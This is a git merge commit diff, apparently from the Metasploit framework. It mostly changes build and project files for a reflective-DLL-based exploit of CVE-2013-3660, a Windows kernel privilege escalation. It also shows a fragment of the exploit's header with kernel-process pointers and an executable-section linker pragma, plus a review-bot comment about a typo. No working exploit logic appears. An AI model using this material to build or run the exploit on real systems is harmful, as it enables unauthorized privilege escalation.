Merge remote-tracking branch 'upstream/master' into submodule

Conflicts:
	external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
bug/bundler_fix
Meatballs 2013-12-08 18:25:03 +00:00
commit ab1ddac0c8
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
116 changed files with 2458 additions and 1514 deletions


@ -20,7 +20,7 @@ wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@ -40,8 +40,8 @@ Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <>



@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -1,357 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="reflective_dll"
ProjectGUID="{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
RootNamespace="reflective_dll"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="1"
GenerateDebugInformation="true"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy ..\Release\reflective_dll.dll ..\bin\"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="2"
WholeProgramOptimization="0"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
WholeProgramOptimization="false"
PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="2"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
OutputFile="$(OutDir)\$(ProjectName).x64.dll"
LinkIncremental="1"
GenerateDebugInformation="true"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy $(OutDir)\$(ProjectName).x64.dll ..\bin\"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\src\ReflectiveDll.c"
>
</File>
<File
RelativePath=".\src\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\src\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\src\ReflectiveLoader.h"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>


@ -1,270 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
<RootNamespace>reflective_dll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v100</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>exploit</TargetName>
<SourcePath>$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\;</SourcePath>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
<SourcePath>$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\;</SourcePath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>true</BufferSecurityCheck>
<CompileAs>Default</CompileAs>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OutputFile>$(OutDir)$(ProjectName).arm.dll</OutputFile>
</Link>
<PostBuildEvent>
<Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsCpp</CompileAs>
</ClCompile>
<Link>
<OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
<ClCompile Include="src\ReflectiveDll.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
<ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
<ClInclude Include="src\ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -1,32 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="src\ReflectiveDll.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="src\ReflectiveLoader.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\ReflectiveDLLInjection.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ReflectiveLoader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ComplexPath.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>


@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\ppr_flatten_rec.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-3660 ppr_flatten_rc x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="ppr_flatten_rec is not supported in x64" />
</Target>
</Project>
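Review bot: The build message text names the project `ppr_flatten_rc`, while the solution path, the target and the project file all use `ppr_flatten_rec`, so build logs will not grep against the real project name; change it to `<Message Text="Building CVE-2013-3660 ppr_flatten_rec x86 Release version" />`. The `x64` target only emits a message and builds nothing, which matches the stated lack of x64 support, but a one-line comment above it such as `<!-- x64 intentionally not built: see message below -->` would make that deliberate rather than looking like an unfinished target.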


@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ppr_flatten_rec", "ppr_flatten_rec\ppr_flatten_rec.vcxproj", "{942BF20A-E438-48B0-A614-A6E0CC2E94BD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.ActiveCfg = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.Build.0 = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.ActiveCfg = Release|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -418,19 +418,10 @@
# define WIN32_NO_STATUS
#endif
#include <stdio.h>
#include <stdarg.h>
#include <stddef.h>
#include <windows.h>
#include <assert.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
@ -448,11 +439,6 @@ static ULONG ComplexPathNumRegion = 0;
static HANDLE Mutex;
static DWORD ComplexPathFinished = 0;
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
@ -509,16 +495,15 @@ ULONG HalQuerySystemInformation;
PULONG TargetPid;
PVOID *PsInitialSystemProcess;
VOID elevator_complex_path();
//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)
#else
#define dprintf(...) do{}while(0);
#endif
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
#ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...);
#define dprintf(...) real_dprintf(__VA_ARGS__)
static void real_dprintf(char *format, ...) {
va_list args;
char buffer[1024];
@ -527,3 +512,7 @@ static void real_dprintf(char *format, ...) {
strcat_s(buffer, sizeof(buffer), "\r\n");
